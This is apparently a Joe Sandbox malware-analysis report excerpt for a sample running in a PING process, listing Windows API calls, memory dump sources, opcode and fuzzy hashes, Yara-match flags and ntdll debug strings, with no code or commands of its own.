                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: eeb72f86ac1694eb338319ebebae05c5e7828ef32382e1dfcef9ea1218520902
                                          • Instruction ID: 76a618b8cf942dc37e03421e972d39c1f21b7c7f22eae2d3d028631d9982e6d5
                                          • Opcode Fuzzy Hash: eeb72f86ac1694eb338319ebebae05c5e7828ef32382e1dfcef9ea1218520902
                                          • Instruction Fuzzy Hash: 95E06DB5200604BFC610EE59DC41FDB37ACEF8A714F00801AF908A7241D630B81187F9
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03CA3305,00000007,00000000,00000004,00000000,004837D8,000000F4), ref: 004991BF
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 29c83403bbd505ee5ec20a26071bfde9c7c0d50249bc95c8e6454c34dea3c249
                                          • Instruction ID: 0ca9028962c696aa5f3fdc16d54178235a4b9d785c6f87a745df869dc37e821d
                                          • Opcode Fuzzy Hash: 29c83403bbd505ee5ec20a26071bfde9c7c0d50249bc95c8e6454c34dea3c249
                                          • Instruction Fuzzy Hash: 44E06D72200204BBCA10EE5ADC41FDB77ACEF85714F00801AF908A7241DA70B81087B8
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,00481720,00497A3F,004950FF,004816ED), ref: 00487BC0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 8a7a1827418aceb2d485039c96084f1b97a4fc422fe8e7a524b20ad6dfed6360
                                          • Instruction ID: 7660877e60f3a10bbbc027dbcabd4ebfe804cf5d74a0ae85d720ae8e515e6710
                                          • Opcode Fuzzy Hash: 8a7a1827418aceb2d485039c96084f1b97a4fc422fe8e7a524b20ad6dfed6360
                                          • Instruction Fuzzy Hash: 6BD05E727843097BE640FAE58C07F563A8C9B50798F18C469F90CD73C3DC59F80042A9
                                          APIs
                                          • GetFileAttributesW.KERNELBASE ref: 00487DC9
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: ff0786c7be1c80a510fb719f429cd852bf9a18e732b7d6f8577a580c574cfd01
                                          • Instruction ID: 99dbcd6af4de3f5880dd81aadfc99858724a6d62e6fb0299051d2f51e9d869cb
                                          • Opcode Fuzzy Hash: ff0786c7be1c80a510fb719f429cd852bf9a18e732b7d6f8577a580c574cfd01
                                          • Instruction Fuzzy Hash: ECD0A73111E6840AE71163FC68992B73F548F4336CB384A87E85DCF5E2C026C89EC311
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,00481720,00497A3F,004950FF,004816ED), ref: 00487BC0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Offset: 00470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_470000_PING.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 9123f07f5745e86bf8cdf3ce5e8eecff8a1ba06442f0ac63584fb8c2d5a45efd
                                          • Instruction ID: 39ff84887b79f36cb3de0741908ffb8582ac0ccdd1540762b036ba6899118f7a
                                          • Opcode Fuzzy Hash: 9123f07f5745e86bf8cdf3ce5e8eecff8a1ba06442f0ac63584fb8c2d5a45efd
                                          • Instruction Fuzzy Hash: 80C0125251D5C94AF313B2B41CA0379BFC40B5325BF2507D3D1C4810E6D5648654C2C2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9f6bd1daf98a11d207b496ea9fc870aa85f4ed16c5a862a066805386fcfb5565
                                          • Instruction ID: a282c28f6a67cc0fc58703e163c0764645f079da4099906dac34f1fb4f4bf0ad
                                          • Opcode Fuzzy Hash: 9f6bd1daf98a11d207b496ea9fc870aa85f4ed16c5a862a066805386fcfb5565
                                          • Instruction Fuzzy Hash: 74B09B719419D5C6EA11E7604A09717790067D1701F15C161D3030641E4B38C1D5F176
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: b5c536855dff8c339f99f72ef4de252e3a24d6eaae737797078f8146c7395277
                                          • Instruction ID: 2d57347f68f34375596531d10707e8cdd369dd449796125bb35e76f2e5ca571a
                                          • Opcode Fuzzy Hash: b5c536855dff8c339f99f72ef4de252e3a24d6eaae737797078f8146c7395277
                                          • Instruction Fuzzy Hash: 645119B6A00126BFDB20DF9C8991A7EF7B8BF49200B508169E865D7645D734DF00DBE1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 63fda9dce4dbed61d0bb961860e2eb4b8ce3e9ea0c4b84a76ac4a090f89614c7
                                          • Instruction ID: 13610911d9aea856981ba49a4add427844ca4f87f74ddb3217a29b155958ad15
                                          • Opcode Fuzzy Hash: 63fda9dce4dbed61d0bb961860e2eb4b8ce3e9ea0c4b84a76ac4a090f89614c7
                                          • Instruction Fuzzy Hash: D2511775A40695AEDB30EF5CC89497FB7F9EF84208B40C46AE896D3641DB74EB00CB61
                                          Strings
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02C446FC
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02C44725
                                          • Execute=1, xrefs: 02C44713
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02C44742
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02C44655
                                          • ExecuteOptions, xrefs: 02C446A0
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 02C44787
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 0769ef05f10bb26b279a8099fff68e9666154f605ff6bb7b9fc8c0c789a3e59b
                                          • Instruction ID: ae762b29c9fd7dc2f866e3fd9310f63619aae9541eb87d4cbdc3823b9cd77cfb
                                          • Opcode Fuzzy Hash: 0769ef05f10bb26b279a8099fff68e9666154f605ff6bb7b9fc8c0c789a3e59b
                                          • Instruction Fuzzy Hash: D4513931A002196AEF29ABA8DCD5FFAB3B9AF45304F1401D9E506A71D0DB70BA49DF50
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$[$]:%u
                                          • API String ID: 48624451-2819853543
                                          • Opcode ID: 1ec9ca073ce015e4af75dc9e0d5eb28680f27ad8daa672ee2926b3ea758a111b
                                          • Instruction ID: 1d3e91bac7f2206daefc9e5217de5891327ff7c3a85b1bd05008007a47ddf533
                                          • Opcode Fuzzy Hash: 1ec9ca073ce015e4af75dc9e0d5eb28680f27ad8daa672ee2926b3ea758a111b
                                          • Instruction Fuzzy Hash: 35216576A00159ABDB10EF79CC44AFE7BF9EF94748F544126ED05E3200EB30DA159BA1
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C4728C
                                          Strings
                                          • RTL: Resource at %p, xrefs: 02C472A3
                                          • RTL: Re-Waiting, xrefs: 02C472C1
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02C47294
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: 19ed3e8bd151e3b58909afec2ef251b4d5a920ca0ceea1609265084dc258a124
                                          • Instruction ID: 846604ac01cdca1b5bf2da5c8f89840abcfd5a062db2e494fe9cc1482e80cac6
                                          • Opcode Fuzzy Hash: 19ed3e8bd151e3b58909afec2ef251b4d5a920ca0ceea1609265084dc258a124
                                          • Instruction Fuzzy Hash: 08412E71700212ABD720CE25CC81B6BB7A6FF95718F100619FD55EB280DB30E98ADBD1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 50b3f93146374464ec62ed1abcdc62d556cdc6d8437013675b1078f0bc04e906
                                          • Instruction ID: ae1e2cd0e733ac3bc71c38d3c6a91b2fa5adedbee04ee5eb423dafbf87b0840a
                                          • Opcode Fuzzy Hash: 50b3f93146374464ec62ed1abcdc62d556cdc6d8437013675b1078f0bc04e906
                                          • Instruction Fuzzy Hash: FD318476A002599FDB20DE29CC54BEEB7FDEF44614F944596EC49E3200EB30AA449FA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: d61c4bcb0017a3bd55272472be98b8286e25d13439ca985882b75bb174a6b048
                                          • Instruction ID: 40eb396c6c2fea6ba0d542a9f2f3fc7be4b3d8dc437e7f401040d9ee0b26de5e
                                          • Opcode Fuzzy Hash: d61c4bcb0017a3bd55272472be98b8286e25d13439ca985882b75bb174a6b048
                                          • Instruction Fuzzy Hash: 70811972D006699BDB21CB54CC45BEEB7B8AF48714F1045EAEA19B7240E7709E84CFA1
                                          APIs
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 02C5CFBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: true
                                          • Associated: 00000009.00000002.4571956387.0000000002CC9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002CCD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_2ba0000_PING.jbxd
                                          Similarity
                                          • API ID: CallFilterFunc@8
                                          • String ID: @$@4Cw@4Cw
                                          • API String ID: 4062629308-3101775584
                                          • Opcode ID: 5056e5c748b730bee55c3d201dde8928ef7934807b4cbf161bc5248008ded89c
                                          • Instruction ID: 9b9628dd94a17d94f8d17dfbf3f90479b966d5d602b31776af01691f5cfc7a59
                                          • Opcode Fuzzy Hash: 5056e5c748b730bee55c3d201dde8928ef7934807b4cbf161bc5248008ded89c
                                          • Instruction Fuzzy Hash: 9941CE71900364DFDB21DFA5C880AAEBBB9FF84B14F10456AED06DB250D734C981DBA4